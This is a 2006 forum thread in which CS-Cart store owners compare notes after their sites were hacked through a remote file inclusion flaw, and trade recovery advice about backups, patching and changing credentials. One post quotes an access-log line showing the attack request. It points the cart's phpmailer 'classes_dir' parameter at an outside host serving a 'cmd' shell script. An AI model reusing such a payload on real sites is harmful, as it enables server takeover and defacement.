Jump to content

  • You cannot start a new topic
  • You cannot reply to this topic

Hacked?? Any ideas? Rate Topic   - - - - -

 
  • zoom4267
  • Senior Member
  • Members
  • Join Date: 27-May 06
  • 847 posts

Posted 05 June 2006 - 05:17 PM #21

I wasnt affected but its nice to know you guys are quick, i feel good knowing your behind this all theway!
Lisa

http://www.skytopdesigns.com Web designs and Development

 
  • diesel
  • Member
  • Banned
  • Join Date: 19-May 06
  • 41 posts

Posted 05 June 2006 - 07:37 PM #22

yeah they have a huge hack problem it's all over and these guys get right into your system adding files and new calls etc .. it's a badddd loop hole.. makes me worries that once patched and files are removed can they still get in?

i have removed all files, directories associated with the hack and when i have gone to change the pword on the main account it goes to a blank page, before it was erroring and saying could not find mailer... and i obviously remoevd what ever file they were making that call to, but now i get a blank page...

they even found my demo site we were beta testing for another site we own.. that's not even live!

 
  • TonyK
  • Member
  • Members
  • Join Date: 03-Mar 06
  • 1686 posts

Posted 05 June 2006 - 08:25 PM #23

do you have a backup copy of your files?

If i was anyone who was hacked, I would remove all the files from my server, put back an older backup, then apply the patch immediately. i would also check my user table for other admins.

this way you remove all files and dont have to guess what files, you still keep your skins, and you are now patched.
Pimpin' skins since v1.0

 
  • smoked1
  • Senior Member
  • Members
  • Join Date: 19-May 06
  • 178 posts

Posted 05 June 2006 - 08:52 PM #24

Wow, my server got raped from this. They uploaded something that was DOSing my firewall causing everything to go down. What a nightmare. I am still picking up the pieces from this.

 
  • TonyK
  • Member
  • Members
  • Join Date: 03-Mar 06
  • 1686 posts

Posted 05 June 2006 - 11:26 PM #25

Yup, happened to our server (not from cs cart) but from another piece of software. They put up a 2 phishing sites, chase, citibank, our isp shut our server down instantly, took us DAYS to get back to normal.

Another note, I would CHANGE your mysql username/password as well, b/c once in your box they can read you config.php , just not change it, then sneak back in later.
Pimpin' skins since v1.0

 
  • Gregh
  • Member
  • Members
  • Join Date: 14-Jan 06
  • 47 posts

Posted 06 June 2006 - 06:33 AM #26

There was a file just called install that looked half missing i allready renamed the cs-cart install there were 2 of them .
Greg
1.3.5 sp4

 
  • ryan
  • Member
  • Members
  • Join Date: 05-Dec 05
  • 79 posts

Posted 06 June 2006 - 01:51 PM #27

Gregh,

Probably better to just delete both and re-upload a backed-up copy.

 
  • kloptops
  • Junior Member
  • Members
  • Join Date: 07-Mar 06
  • 5 posts

Posted 07 June 2006 - 05:29 AM #28

Our site was thrashed pretty serverely, after injecting their own phishing sites and other crap on the server, they deleted every single file they had the permissions to alter. As a result i end up just deleting everything, and doing a fresh install (Luckily i had done the upgrade last week, and was organized enough to make it easier for the next time i had to upgrade). I went through the database with a fine tooth comb (Took a good 4hrs). I'm now just going through the site (with it showing up being under maitnance) and making sure nothing else is screwed up.

However all this hasn't discouraged me from the software one bit, and i'm very happy with its performance, and the response time from the cs-cart team was excellent. So thank you CS-Cart for a quality shopping cart, it makes my life that much easier. If only i could say the same about my webhost.

 
  • smoked1
  • Senior Member
  • Members
  • Join Date: 19-May 06
  • 178 posts

Posted 07 June 2006 - 06:19 AM #29

I just hope that they audit the code before the next release so that this does not happen again. From what I read this was a very easy thing to exploit. It was as simple as adding a files location to a url.

 
  • recedo
  • Senior Member
  • Members
  • Join Date: 24-Apr 06
  • 498 posts

Posted 07 June 2006 - 06:29 AM #30

I just hope that they audit the code before the next release so that this does not happen again. From what I read this was a very easy thing to exploit. It was as simple as adding a files location to a url.


It may be something easy to exploit, but these guys are human like the rest of us. Everyone can make mistakes. I give the guys credit for a quick patch too. I think if they had someone in over the weekend they would have responded even quicker anyway.

Perhaps they could use the services of a third party to test their new releases as it's easy to miss things and let them slip through the net.

Don't think I'm trying to draw this into an argument by what I have said there though ;)

Simon

 
  • ryan
  • Member
  • Members
  • Join Date: 05-Dec 05
  • 79 posts

Posted 07 June 2006 - 03:39 PM #31

The thing is it wasn't a new release issue, it affected earlier versions as well, as they had a patch for version 1.3.0. Like an earlier post said, everyone makes mistakes and they did a superfast job at getting a fix posted!

 
  • TonyK
  • Member
  • Members
  • Join Date: 03-Mar 06
  • 1686 posts

Posted 07 June 2006 - 04:21 PM #32

Just another PRIME EXAMPLE of why we all should have backups! Both database and files.

So much easier to delete everything, put a backup of db/files in place, then apply a patch, and BAM, your back to normal.

BACKUPS, BACKUPS, BACKUPS! :-)
Pimpin' skins since v1.0

 
  • smoked1
  • Senior Member
  • Members
  • Join Date: 19-May 06
  • 178 posts

Posted 07 June 2006 - 08:59 PM #33

Just another PRIME EXAMPLE of why we all should have backups! Both database and files.

So much easier to delete everything, put a backup of db/files in place, then apply a patch, and BAM, your back to normal.

BACKUPS, BACKUPS, BACKUPS! :-)


Sometimes it's not that simple. Sometimes a server must be completely reinstalled when it has been compromised. I manage all of my own servers so when something like this happens I have to go through everything to make sure that nothing has been touched that should not be. I understand that everyone is human and that's fine. I am just saying that they should go through all of the code and double check all input validation.

 
  • TonyK
  • Member
  • Members
  • Join Date: 03-Mar 06
  • 1686 posts

Posted 08 June 2006 - 01:43 AM #34

So then you make a full backup of your server...I find it hard to believe you manage your own boxes but dont take Backups??

and while its not a complete answer, it does eliminate alot of extra work. if you have a good backup. (ie, recreating tpl's over. etc)
Pimpin' skins since v1.0

 
  • smoked1
  • Senior Member
  • Members
  • Join Date: 19-May 06
  • 178 posts

Posted 08 June 2006 - 03:26 AM #35

Yes, I take complete backups every day to a DDS-4 tape drive on one server and a VXA-320 drive on another server. That is not my point. I don't know if you have ever restored a UNIX box from tape but it's not a fun thing to do. You seem to be responding to this from a shared host point of view. The hacker uploaded a php script that attacked my firewall and when the firewall went down. I was not having a good time. I am actually a consultant for a company that sells backup devices and I am the one that handles all tech support calls. My point here is that "take backups" is not the answer, it is a pre-caution. The answer is to properly audit your code so that any vulnerability that is found is not something that every script kiddie on the planet can exploit. I am just glad that none of the other sites on my server/network have been compromised. As far as I am concerned I got very lucky. I don't own the company that was hacked but I am the one ultimately responsible for all of the servers and when this happened it caused grief for my employer because he lost money and me because I was under the gun for 4 hours. I still think that CS-Cart is a great shopping cart and I will continue to use it but understand that I just purchased it about 1 week ago before this happened. What I told my employer is this, "Welcome to the internet because this is the nature of it. It's a ****in war-zone out there and it's important to be properly armed". When I started here the company had no tape backups and no firewall. :)

 
  • MikeK
  • Senior Member
  • Members
  • Join Date: 26-Apr 06
  • 434 posts

Posted 08 June 2006 - 05:27 AM #36

Add my site to the list of victims. They put up a song and some Arabic text. They also put in a bit of nasty code:

"GET /Store/classes/phpmailer/class.cs_phpmailer.php?classes_dir=http%3A%2F%2F(Link: http://www.shellteam...ct=img&img=home HTTP/1.0" 200 209 "(Link: http://nvone.com/Sto.../clever.txt?cmd)http://nvone.com/Sto.../clever.txt?cmd" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

Looking at this I'd say whoever did this was pretty familiar with CS-C.

Our logs say the hacker came from 212.138.47.14, although I suspect this will be a wild goose chase.

They took out whatever they could, but fortunately didn't really do that much damage. Fortunately, I've got it all backed up and they didn't get into the db's or mail, or any other site hosted on my server. Really all they wiped out was our main website, CS-C, and vTiger. CS-C was backed up to the minute, and vTiger was going to get a major upgrade anyway, and the most important data is safely tucked away in a mySQL file located elsewhere.

They also added a file called 9.php which was some kind of an ftp client or a file manager. Dunno for sure, but I got rid of it.

Darn it all, I was going to do the upgrade to 1.3.3 and install the patch tonight.

I do want to acknowledge and thank CS-C for e-mailing me about this issue well before I got hacked. I've only got myself to blame for procrastinating.

Cheers,
Mike

 
  • Gregh
  • Member
  • Members
  • Join Date: 14-Jan 06
  • 47 posts

Posted 08 June 2006 - 09:40 AM #37

Ive just been going through our phpmailer files on the server should this file be in there
dc.aout?
See Attachment
Greg
1.3.5 sp4

 
  • snorocket
  • Forum Janitor
  • Members
  • Join Date: 15-Mar 06
  • 2519 posts

Posted 08 June 2006 - 01:11 PM #38

Hi Gregh, that is some kind of virus that should'nt be there, I'd have a close look at other files on your server nad apply the security patches ASAP, if others notice certain IP addresses maybe we can gather a list and block, this is the reason why we nned IP Blocking added into CS.
SNOROCKET.COM, Now Accepting PRE-ORDERS:
Customer Service (Helpdesk) Addon for CS-Cart v4.3.1
Quote and Invoicing Addon for CS-Cart v4.3.1

 
  • TonyK
  • Member
  • Members
  • Join Date: 03-Mar 06
  • 1686 posts

Posted 08 June 2006 - 05:12 PM #39

Just let me know when you find a bug free piece of software....doesnt happen.

and if you READ my response
" and while its not a complete answer, it does eliminate alot of extra work."



Yes, I take complete backups every day to a DDS-4 tape drive on one server and a VXA-320 drive on another server. That is not my point. I don't know if you have ever restored a UNIX box from tape but it's not a fun thing to do. You seem to be responding to this from a shared host point of view. The hacker uploaded a php script that attacked my firewall and when the firewall went down. I was not having a good time. I am actually a consultant for a company that sells backup devices and I am the one that handles all tech support calls. My point here is that "take backups" is not the answer, it is a pre-caution. The answer is to properly audit your code so that any vulnerability that is found is not something that every script kiddie on the planet can exploit. I am just glad that none of the other sites on my server/network have been compromised. As far as I am concerned I got very lucky. I don't own the company that was hacked but I am the one ultimately responsible for all of the servers and when this happened it caused grief for my employer because he lost money and me because I was under the gun for 4 hours. I still think that CS-Cart is a great shopping cart and I will continue to use it but understand that I just purchased it about 1 week ago before this happened. What I told my employer is this, "Welcome to the internet because this is the nature of it. It's a ****in war-zone out there and it's important to be properly armed". When I started here the company had no tape backups and no firewall. :)


Pimpin' skins since v1.0

 
  • Gregh
  • Member
  • Members
  • Join Date: 14-Jan 06
  • 47 posts

Posted 09 June 2006 - 08:59 AM #40

Yes mate this is arfter the patch put the patch up soon as it was released still trying to find what shouldnt be there.
We will get there
Greg
Greg
1.3.5 sp4